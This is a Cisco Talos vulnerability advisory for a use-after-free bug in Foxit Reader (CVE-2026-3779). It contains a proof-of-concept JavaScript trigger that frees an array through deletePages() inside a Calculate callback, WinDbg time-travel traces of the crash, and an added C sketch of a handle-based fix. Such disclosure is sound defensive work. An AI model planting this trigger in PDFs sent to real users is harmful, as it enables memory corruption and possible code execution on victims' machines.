Talos Vulnerability Report

TALOS-2026-2365

Foxit Reader List Box Calculate Array Use-After-Free Vulnerability

March 31, 2026

CVE Number

CVE-2026-3779

SUMMARY

A use-after-free vulnerability exists in the way Foxit Reader handles an Array object. Specially crafted JavaScript code inside a malicious PDF document can trigger this vulnerability, which can lead to memory corruption and result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Foxit Reader 2025.3.0.35737

PRODUCT URLS

Foxit Reader - https://www.foxitsoftware.com/pdf-reader/

CVSSv3 SCORE

7.8 - CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-416 - Use After Free

DETAILS

Foxit PDF Reader is one of the most popular PDF document readers. It aims for feature parity with Adobe’s Acrobat Reader. As a complete and feature-rich PDF reader, it supports JavaScript for interactive documents and dynamic forms. JavaScript support poses an additional attack surface. Foxit Reader uses the V8 JavaScript engine.

JavaScript support in PDF renderers and editors enables dynamic documents that can change based on user input or events. There exists a use-after-free vulnerability in the way Foxit Reader handles an array object. This can be illustrated by the following proof-of-concept code:

function main() {
    app.activeDocs[0].getField('List Box0').setItems(['a',app.activeDocs[0]["IDS_MONTH_INFO"]]);
    getField("txt2").setAction("Calculate",'delete_pages();');
    app.activeDocs[0].getField('List Box0')['value'] = new Array(10);
}

function delete_pages() {
    app.activeDocs[0].deletePages();
}

The above code simply assigns a callback function to the Calculate event for the field txt2, which is promptly triggered by a call to getField. In the action callback, all that happens is a call to deletePages, which in turn ends up freeing all the objects associated with a page. The use-after-free vulnerability occurs when an array object is freed by deletePages() and is then used without any validation. We can observe the following in the debugger (with PageHeap enabled):

0:007> p
Breakpoint 1 hit
Time Travel Position: 288B55:368
FoxitPDFReader!safe_vsnprintf+0x3404c7:
00007ff6`f8f076d7 b948000000      mov     ecx,48h ;<------------- (1)
0:007> p
Time Travel Position: 288B55:369
FoxitPDFReader!safe_vsnprintf+0x3404cc:
00007ff6`f8f076dc e81fa72c00      call    FoxitPDFReader!safe_vsnprintf+0x60abf0 (00007ff6`f91d1e00) ;<------------- (2)
0:007> p
Time Travel Position: 288B6A:B5F
FoxitPDFReader!safe_vsnprintf+0x3404d1:
00007ff6`f8f076e1 488985d8000000  mov     qword ptr [rbp+0D8h],rax ss:000000af`78be8178=00000248351ddfb0
0:007> r
rax=000002484298bfb0 rbx=00000248377dafd0 rcx=000000007ffe0380
rdx=d0d0d0d0d0d0d0d0 rsi=0000000000400000 rdi=00000248351ddfb0
rip=00007ff6f8f076e1 rsp=000000af78be7fa0 rbp=000000af78be80a0
 r8=0000000000000000  r9=0000000000000000 r10=0000000000000000
r11=000002484298bfb0 r12=00000248351ddfb0 r13=0000000000000000
r14=00007ff6fe5c27b8 r15=00000248377daeb0
iopl=0         nv up ei pl nz na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
FoxitPDFReader!safe_vsnprintf+0x3404d1:
00007ff6`f8f076e1 488985d8000000  mov     qword ptr [rbp+0D8h],rax ss:000000af`78be8178=00000248351ddfb0
0:007> dd 000002484298bfb0                       ;<------------- (3)
00000248`4298bfb0  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
00000248`4298bfc0  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
00000248`4298bfd0  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
00000248`4298bfe0  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
00000248`4298bff0  c0c0c0c0 c0c0c0c0 d0d0d0d0 d0d0d0d0
00000248`4298c000  ???????? ???????? ???????? ????????
00000248`4298c010  ???????? ???????? ???????? ????????
00000248`4298c020  ???????? ???????? ???????? ????????

The vulnerable object is created by calling a function at (2), and the size of the object is passed to the function at (1). After allocation, the vulnerable object is examined at (3).

0:007> r
rax=0000000000000001 rbx=00000248377dafd0 rcx=0000024854540000
rdx=0000024854540000 rsi=000002482280cfc0 rdi=000002484298bfb0
rip=00007ff6f8f0a1e1 rsp=000000af78bebea0 rbp=000000000000000a
 r8=0000000000000000  r9=0000000000000001 r10=00000000ffffffef
r11=000000af78bebdd0 r12=000000af78bebf78 r13=00000248377daeb0
r14=0000000000000000 r15=00000248351ddfb0
iopl=0         nv up ei pl nz na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
FoxitPDFReader!safe_vsnprintf+0x342fd1:
00007ff6`f8f0a1e1 488bcf          mov     rcx,rdi  ; <----------------  (4)
0:007> p
Time Travel Position: 3720A9:254
FoxitPDFReader!safe_vsnprintf+0x342fd4:
00007ff6`f8f0a1e4 e8f77c2c00      call    FoxitPDFReader!safe_vsnprintf+0x60acd0 (00007ff6`f91d1ee0) ; <---------------- (5)

[...]
0:007> p
Time Travel Position: 3720A9:273
FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x1c79a66:
00007ff6`fc7d1116 4883ec20        sub     rsp,20h
0:007> p
Time Travel Position: 3720A9:274
FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x1c79a6a:
00007ff6`fc7d111a 4c8bc1          mov     r8,rcx ; <---------------- (6)
0:007> dd rcx
00000248`4298bfb0  00000007 00000000 377daeb0 00000248
00000248`4298bfc0  351ddfb0 00000248 00000000 00000000
00000248`4298bfd0  2ddb1ff0 00000248 00000000 00000001
00000248`4298bfe0  00000000 00000008 00000000 c0c0c0c0
00000248`4298bff0  00000000 00000000 d0d0d0d0 d0d0d0d0
00000248`4298c000  ???????? ???????? ???????? ????????
00000248`4298c010  ???????? ???????? ???????? ????????
00000248`4298c020  ???????? ???????? ???????? ????????
0:007> p
Time Travel Position: 3720A9:275
FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x1c79a6d:
00007ff6`fc7d111d 33d2            xor     edx,edx
0:007> p
Time Travel Position: 3720A9:276
FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x1c79a6f:
00007ff6`fc7d111f 488b0d128fde02  mov     rcx,qword ptr [FoxitPDFReader!fLI::FLAGS_v+0xb9af0 (00007ff6`ff5ba038)] ds:00007ff6`ff5ba038=0000024854540000
0:007> p
Time Travel Position: 3720A9:277
FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x1c79a76:
00007ff6`fc7d1126 ff158cc08900    call    qword ptr [FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x2515b08 (00007ff6`fd06d1b8)] ds:00007ff6`fd06d1b8={KERNEL32!HeapFreeStub (00007ff8`323c58b0)}   ; <---------------- (7)
0:007> p
Time Travel Position: 3720AE:249
FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x1c79a7c:
00007ff6`fc7d112c 85c0            test    eax,eax
0:007> dd 00000248`4298bfb0  ; <---------------- (8)
00000248`4298bfb0  00000007 00000000 377daeb0 00000248
00000248`4298bfc0  351ddfb0 00000248 00000000 00000000
00000248`4298bfd0  2ddb1ff0 00000248 00000000 00000001
00000248`4298bfe0  00000000 00000008 00000000 c0c0c0c0
00000248`4298bff0  00000000 00000000 d0d0d0d0 d0d0d0d0
00000248`4298c000  ???????? ???????? ???????? ????????
00000248`4298c010  ???????? ???????? ???????? ????????
00000248`4298c020  ???????? ???????? ???????? ????????

Later, when the JavaScript API deletePages() is called, it frees all the objects associated with the page. It calls a method at (5), which in turn calls the HeapFree function at (7) to free the vulnerable object. The rcx register at (6) contains a pointer to the vulnerable object. The method called at (7) frees the object, and the contents of the object are examined at (8) after the free operation. Note that the analysis was performed using a TTD trace, and at (8) the TTD index shows the last recorded values of the address after it was freed.

The vulnerable object is later used without any validation. This can be observed in a debugger at the time of the crash:

0:007> g
(144c.d20): Access violation - code c0000005 (first/second chance not available)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
Time Travel Position: 372B43:0
FoxitPDFReader!safe_vsnprintf+0x35695b:
00007ff6`f8f1db6b 488b4910        mov     rcx,qword ptr [rcx+10h] ds:00000248`4298bfc0=00000248351ddfb0 ;<---------------- (9)
0:007> u
FoxitPDFReader!safe_vsnprintf+0x35695b: 
00007ff6`f8f1db6b 488b4910        mov     rcx,qword ptr [rcx+10h]
00007ff6`f8f1db6f e82c99ffff      call    FoxitPDFReader!safe_vsnprintf+0x350290 (00007ff6`f8f174a0)
00007ff6`f8f1db74 4885c0          test    rax,rax
00007ff6`f8f1db77 7405            je      FoxitPDFReader!safe_vsnprintf+0x35696e (00007ff6`f8f1db7e)
00007ff6`f8f1db79 803805          cmp     byte ptr [rax],5
00007ff6`f8f1db7c 7470            je      FoxitPDFReader!safe_vsnprintf+0x3569de (00007ff6`f8f1dbee)
00007ff6`f8f1db7e 8b03            mov     eax,dword ptr [rbx]
00007ff6`f8f1db80 83e807          sub     eax,7
0:007> r
rax=00000000ffffffff rbx=000002484298bfb0 rcx=000002484298bfb0
rdx=00007ff6fe5c2758 rsi=0000000000000001 rdi=000000af78bed1c8
rip=00007ff6f8f1db6b rsp=000000af78bed090 rbp=0000000000000001
 r8=0000000000000000  r9=0000000000000001 r10=00000000ffffffef
r11=000000af78becf40 r12=0000000000000009 r13=000000af78bed310
r14=000000000000000a r15=00007ff6fe5c2758
iopl=0         nv up ei pl zr na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
FoxitPDFReader!safe_vsnprintf+0x35695b:
00007ff6`f8f1db6b 488b4910        mov     rcx,qword ptr [rcx+10h] ds:00000248`4298bfc0=00000248351ddfb0
0:007> dd 000002484298bfb0
00000248`4298bfb0  00000007 00000000 377daeb0 00000248
00000248`4298bfc0  351ddfb0 00000248 00000000 00000000
00000248`4298bfd0  2ddb1ff0 00000248 00000000 00000001
00000248`4298bfe0  00000000 00000008 00000000 c0c0c0c0
00000248`4298bff0  00000000 00000000 d0d0d0d0 d0d0d0d0
00000248`4298c000  ???????? ???????? ???????? ????????
00000248`4298c010  ???????? ???????? ???????? ????????
00000248`4298c020  ???????? ???????? ???????? ????????
0:007> kb
 # RetAddr               : Args to Child                                                           : Call Site
00 00007ff6`f8f1db34     : 00000000`00000001 000000af`78bed1c8 000000af`78bed230 00000000`00000009 : FoxitPDFReader!safe_vsnprintf+0x35695b
01 00007ff6`fa40f92f     : 00000000`00000001 000000af`78bed218 00000000`00000000 00000000`00000001 : FoxitPDFReader!safe_vsnprintf+0x356924
02 00007ff6`fa3f2b10     : 000000af`78bed300 000000af`78bed328 000000af`78bed3d0 000000af`78bed420 : FoxitPDFReader!safe_vsnprintf+0x184871f
03 00007ff6`fa41d2e1     : 00000248`1f0b6e40 000000af`78bed420 00000000`00000001 00000248`34bc3000 : FoxitPDFReader!safe_vsnprintf+0x182b900
04 00007ff6`fa3e5cda     : 00000248`1f0b6e40 00000000`00000000 000000af`78bed430 00000248`1f0b6e40 : FoxitPDFReader!safe_vsnprintf+0x18560d1
05 00007ff6`fa8d91b4     : 00000248`34bc3000 00000248`30804ff0 00000248`41b9fff0 00000248`42d40fe0 : FoxitPDFReader!safe_vsnprintf+0x181eaca
06 00007ff6`fa9722a2     : 00000248`450a20f0 000000af`78bedd08 000000af`78bed480 000000af`78bedce8 : FoxitPDFReader!FXJSE_GetClass+0x824
07 00007ff6`fa98a482     : 000000af`78bedc00 000000af`78bed699 000000af`78bedcf0 00000248`450a20f0 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0x98bf2
08 00007ff6`fa98a15d     : 000000af`78bedd08 00000000`00000000 000000af`78bedd08 000000af`78bed968 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0xb0dd2
09 00007ff6`fa98ab3b     : 00000000`00000000 00000248`450a20e8 00000000`00000000 00000000`00000000 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0xb0aad
0a 00007ff6`fa98a0ed     : 000000af`78bedd08 000000af`78beda01 000000af`78bedd08 00007ff6`f7270000 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0xb148b
0b 00007ff6`fa989d1d     : 00000251`00098305 00000002`faaa7f01 00000248`34bc3000 00000251`001b78ad : FoxitPDFReader!CFXJSE_Arguments::GetValue+0xb0a3d
0c 00007ff6`fb061c38     : 00000000`00000001 000000af`78bedc01 000000af`78bedad0 00000000`0000004e : FoxitPDFReader!CFXJSE_Arguments::GetValue+0xb066d
0d 00007ff6`fb058cdc     : 00000000`00000000 00000248`450a4000 00000248`00000003 00000000`00000000 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x50a588
0e 00007ff6`faf07bee     : 00007ff6`fb058ab0 00000251`001d1675 00000000`0000004e 00000248`450a20d0 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x50162c
0f 00007ff6`faff461b     : 00000251`00000e2d 00000251`00098305 00000251`00000069 ffffffff`fffffffe : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x3b053e
10 00007ff6`fae5bfa1     : 00000251`0009e8e1 00000251`001eb615 00000000`00000014 00000251`0018abb1 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x49cf6b
11 00007ff6`fae5bfa1     : 00000251`001d160d 00000251`001eb51d 00000251`001eb56d 00000251`00000069 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x3048f1
12 00007ff6`fae596d0     : 00000251`001d160d 00000251`00000775 00000251`001eb51d 00000000`0000001a : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x3048f1
13 00007ff6`fae59227     : 00000000`00000000 00000000`00000000 00000000`00000002 00000000`00000000 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x302020
14 00007ff6`fa92f07f     : 000000af`78bee0fc 000000af`78bedfe9 000000af`78bee168 00000000`00000005 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x301b77
15 00007ff6`fa92eb24     : 000000af`78bee168 00000248`34bc3000 00000251`001e0005 00000248`34bcc110 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0x559cf
16 00007ff6`fa90ea1b     : 00000248`34bc32b0 000000af`78bee210 00000248`2d161a50 00000248`450a2020 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0x55474
17 00007ff6`fa90e781     : 00000248`450a2050 00000248`450a2018 00000248`34bc3000 00000248`44b56fc0 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0x3536b
18 00007ff6`fa8d6746     : 00000248`41ab3ff0 00000248`450a2050 00000248`450a2018 00000248`41ab3ff0 : FoxitPDFReader!CFXJSE_Arguments::GetValue+0x350d1
19 00007ff6`fa8d768b     : 00000248`450a2050 00000248`41ab3ff0 00000248`4509be90 00000248`450a2020 : FoxitPDFReader!FXJSE_Runtime_Release+0x1106
1a 00007ff6`fa37f35d     : 00000000`00000000 00000248`30ac2fb8 00000248`30ac2fb8 00000248`30ac2fb0 : FoxitPDFReader!FXJSE_ExecuteScript+0x27b
1b 00007ff6`f7e3dde3     : 00000248`00000003 00000248`1823cb90 000000af`78bee610 000000af`78bee530 : FoxitPDFReader!safe_vsnprintf+0x17b814d
1c 00007ff6`f7e3c4b3     : 00000248`00535ff0 000000af`78bee5c0 00000000`00000000 00000248`1a87afb0 : FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x3ab453
1d 00007ff6`f7e3a866     : 00007ff6`f7e3a790 00000248`00535ff0 00000248`44a94d30 00000000`00000000 : FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x3a9b23
1e 00007ff6`f74992d9     : 00007ff6`f7e3a790 000000af`78bee700 00000248`37bc2dc8 00000248`02c5cfd0 : FoxitPDFReader!std::basic_ios<char,std::char_traits<char> >::fill+0x3a7ed6
1f 00007ff6`f772a93e     : 00000000`00000000 00000000`00060510 00000248`1a87afb0 000000af`78bee740 : FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x7909
20 00007ff6`fc43bbfa     : 00000000`00000189 00000000`00000001 00007ff6`f772a8c0 00000000`00000000 : FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::put+0x7023e
21 00007ff6`fc43d107     : 00000248`35104cb0 00000000`00000000 00000000`00000000 00000000`00000000 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x18e454a
22 00007ff6`fc43602c     : 00000000`00000000 00000248`5a292eb8 00000000`00000000 00000000`00000429 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x18e5a57
23 00007ff6`fc436aec     : 00007ff6`ff382078 00000000`00060510 00000248`5a292e78 00007ff6`fc42c690 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x18de97c
24 00007ff8`31d6ef5c     : 00000000`00000001 00000248`5a292e20 00000000`00060510 00000000`00060510 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x18df43c
25 00007ff8`31d6e684     : 00000000`00000000 00007ff6`fc436a98 000000af`78dd2800 00007ff6`fc42e33c : USER32!UserCallWinProcCheckWow+0x50c
26 00007ff6`f76a8c7a     : 00007ff6`fc436a98 00000248`024875d0 00000000`00000001 00007ff6`ff5bb190 : USER32!DispatchMessageWorker+0x494
27 00007ff6`f76a8d74     : 00000000`00000001 00007ff6`ff5bb190 00000000`00000000 00000000`00000000 : FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x15f0fa
28 00007ff6`fca24eb7     : 00000000`00000001 00007ff6`f7270000 00000000`00000000 00000248`545bdf3c : FoxitPDFReader!std::basic_ostream<char,std::char_traits<char> >::operator<<+0x15f1f4
29 00007ff6`fc69bdf2     : 00000000`00000001 00000000`00000000 00000000`00000000 00000000`00000000 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x1ecd807
2a 00007ff8`323c7374     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : FoxitPDFReader!CrashForExceptionInNonABICompliantCodeRange+0x1b44742
2b 00007ff8`33c9cc91     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
2c 00000000`00000000     : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21

The crash occurs at (9) when the object is dereferenced without any validation. Depending on the memory layout of the process, it may be possible to perform arbitrary read and write operations, which could ultimately be exploited to achieve arbitrary code execution.
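The lifetime rule that the code at (9) lacks can be shown in a small model. This is an added example, not code from the report or from Foxit: the handle table, obj_new, obj_get, delete_pages and set_value_checked are hypothetical names. The object is reached through a generation-checked handle and re-resolved after the script-controlled callback returns, so a free performed inside the callback is detected instead of dereferenced.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Hypothetical model, not Foxit code: page-owned objects are reached through
 * generation-checked handles, never through cached raw pointers. */
#define MAX_OBJS 8
typedef struct { int length; } ArrayObj;
typedef struct { ArrayObj *ptr; uint32_t gen; } Slot;
typedef struct { uint32_t index, gen; } Handle;
typedef void (*calc_cb)(void);
static Slot table[MAX_OBJS];

static Handle obj_new(int length) {
    Handle none = { MAX_OBJS, 0 };              /* out-of-range index = invalid */
    for (uint32_t i = 0; i < MAX_OBJS; i++) {
        if (table[i].ptr) continue;
        table[i].ptr = calloc(1, sizeof(ArrayObj));
        if (!table[i].ptr) return none;
        table[i].ptr->length = length;
        Handle h = { i, table[i].gen };
        return h;
    }
    return none;
}

/* NULL when the object was freed, or its slot reused, after h was issued. */
static ArrayObj *obj_get(Handle h) {
    if (h.index >= MAX_OBJS) return NULL;
    Slot *s = &table[h.index];
    return (s->ptr && s->gen == h.gen) ? s->ptr : NULL;
}

/* Stands in for deletePages(): frees every object and invalidates handles. */
static void delete_pages(void) {
    for (uint32_t i = 0; i < MAX_OBJS; i++) {
        free(table[i].ptr);
        table[i].ptr = NULL;
        table[i].gen++;
    }
}

/* Stands in for the value assignment that fires the Calculate action.
 * Returns the array length, or -1 if the object did not survive the callback. */
static int set_value_checked(Handle h, calc_cb on_calculate) {
    if (!obj_get(h)) return -1;
    if (on_calculate) on_calculate();           /* script-controlled code runs here */
    ArrayObj *a = obj_get(h);                   /* re-resolve after the callback */
    return a ? a->length : -1;
}

int main(void) {
    Handle h = obj_new(10);
    printf("no callback: %d\n", set_value_checked(h, NULL));
    printf("callback frees: %d\n", set_value_checked(h, delete_pages));
    return 0;
}
```

The generation counter also rejects a stale handle after the slot has been reallocated, which is the case a plain NULL check on a cached pointer cannot catch.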

TIMELINE

2026-02-10 - Vendor Disclosure
2026-03-31 - Vendor Patch Release
2026-03-31 - Public Release

Credit

Discovered by KPC of Cisco Talos.